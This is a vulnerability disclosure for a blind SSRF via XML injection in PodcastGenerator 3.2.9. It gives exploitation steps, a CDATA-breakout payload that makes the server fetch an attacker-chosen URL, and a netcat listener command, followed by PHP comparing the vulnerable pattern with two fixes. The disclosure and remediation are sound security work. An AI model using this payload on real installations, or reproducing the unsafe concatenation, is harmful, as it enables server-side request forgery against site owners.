PodcastGenerator 3.2.9 — Blind SSRF via XML Injection
#Title:
PodcastGenerator 3.2.9 — Blind SSRF via XML Injection.
#Vulnerability discovery:
This is an SSRF vulnerability via XML injection found in PodcastGenerator 3.2.9. This vulnerability was discovered by me on July 1, 2023.
#Description of the vulnerability:
Podcast Generator (PG) is an open source Content Management System written in PHP and specifically designed for self-hosting podcasts.
PG provides the user with the tools to easily manage all aspects of publishing and distributing a podcast, from uploading episodes to submitting them to Podcast Index and major directories such as Apple Podcasts, Google Podcasts and Spotify.
As I usually say, if you ignore input validation, vulnerabilities occur. Input validation is the motto of cyber security. This vulnerability results from missing input validation.
This application does not use a database; it keeps its data in XML files instead. Because the required input validation is not performed on the fields written into that XML, XML injection is possible.
#Affected Versions:
Version 3.2.9 and all previous versions are affected.
#Step by Step Exploitation:
Step 1. Log in to an account.
Step 2. Go to 'Upload New Episodes' (http://localhost/PodcastGenerator/admin/episodes_upload.php).
Step 3. Fill in all fields and set the Short Description field to the payload below. The URL inside <imgPG> is the host the server will connect to (the attacker's domain); here it is http://localhost:3132.
payload:
test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test
By the way, I used localhost. If you have a domain, you can use the domain.
Step 4. Upload the episode.
Step 5. I am listening on port 3132 because I am watching for incoming requests:
nc -lvp 3132
And I receive a request. But this is a blind SSRF.
youtube poc: https://youtu.be/YkGZPGoPnoc
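The mechanism behind the payload is that a "]]>" inside a field pasted into a CDATA section terminates the section early, so the rest of the input is parsed as markup. The following PHP is an added example, not PodcastGenerator's own code: the element names come from the payload above, while the template, the function names and the sample input are assumptions. It shows the vulnerable concatenation pattern next to two safe ways to store the same input, and parses each result to show what a consumer of the XML would actually see.

```php
<?php
// Added example, not PodcastGenerator's own code. It shows why a "]]>" in a
// user-supplied field breaks out of a CDATA section when the XML is assembled
// by string concatenation, and two ways to store the same input safely.
// Element names follow the advisory; the template and function names are assumed.
declare(strict_types=1);

// Constructed input with the shape of the advisory's payload.
const SAMPLE_SHORT_DESC = 'test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test';

// Vulnerable pattern (assumed): the field is pasted into a CDATA template as-is.
// The "]]>" in the input closes the CDATA section early, so everything after it
// is parsed as markup and an <imgPG> element appears in the episode.
function buildEpisodeXmlUnsafe(string $shortDesc): string
{
    return '<episode><shortdescPG><![CDATA[' . $shortDesc . ']]></shortdescPG></episode>';
}

// Fix 1: keep the template but make "]]>" unable to terminate the section.
// "]]]]><![CDATA[>" closes the CDATA after "]]" and reopens it before ">",
// so a parser reads the original three characters as plain text.
function escapeCdata(string $text): string
{
    return str_replace(']]>', ']]]]><![CDATA[>', $text);
}

function buildEpisodeXmlEscaped(string $shortDesc): string
{
    return '<episode><shortdescPG><![CDATA[' . escapeCdata($shortDesc) . ']]></shortdescPG></episode>';
}

// Fix 2: let the XML library serialise the document. libxml2 (behind DOMDocument)
// applies the same split to CDATA content, so no markup from the input survives.
function buildEpisodeXmlDom(string $shortDesc): string
{
    $doc = new DOMDocument('1.0', 'UTF-8');
    $episode = $doc->createElement('episode');
    $desc = $doc->createElement('shortdescPG');
    $desc->appendChild($doc->createCDATASection($shortDesc));
    $episode->appendChild($desc);
    $doc->appendChild($episode);
    return $doc->saveXML($episode);
}

// What a consumer of the stored XML sees: how many <imgPG> elements exist and
// what the short description contains after parsing.
function inspectEpisodeXml(string $xml): array
{
    $doc = new DOMDocument();
    if (!$doc->loadXML($xml)) {
        throw new RuntimeException('stored XML is not well-formed');
    }
    return [
        'imgPG_count' => $doc->getElementsByTagName('imgPG')->length,
        'shortdesc'   => $doc->getElementsByTagName('shortdescPG')->item(0)->textContent,
    ];
}

$variants = [
    'unsafe'  => buildEpisodeXmlUnsafe(SAMPLE_SHORT_DESC),
    'escaped' => buildEpisodeXmlEscaped(SAMPLE_SHORT_DESC),
    'dom'     => buildEpisodeXmlDom(SAMPLE_SHORT_DESC),
];
foreach ($variants as $label => $xml) {
    $info = inspectEpisodeXml($xml);
    printf("%-8s imgPG elements: %d  short description: %s\n",
        $label, $info['imgPG_count'], $info['shortdesc']);
}
```

With the sample input the unsafe variant yields one <imgPG> element pointing at the attacker's URL and a short description of just "test", which is exactly the injected structure the server later fetches. Both fixed variants yield zero <imgPG> elements and a short description equal to the full original string, so the payload is stored as inert text. The DOMDocument route is preferable because it covers every field and every special character rather than the one sequence the escaper knows about.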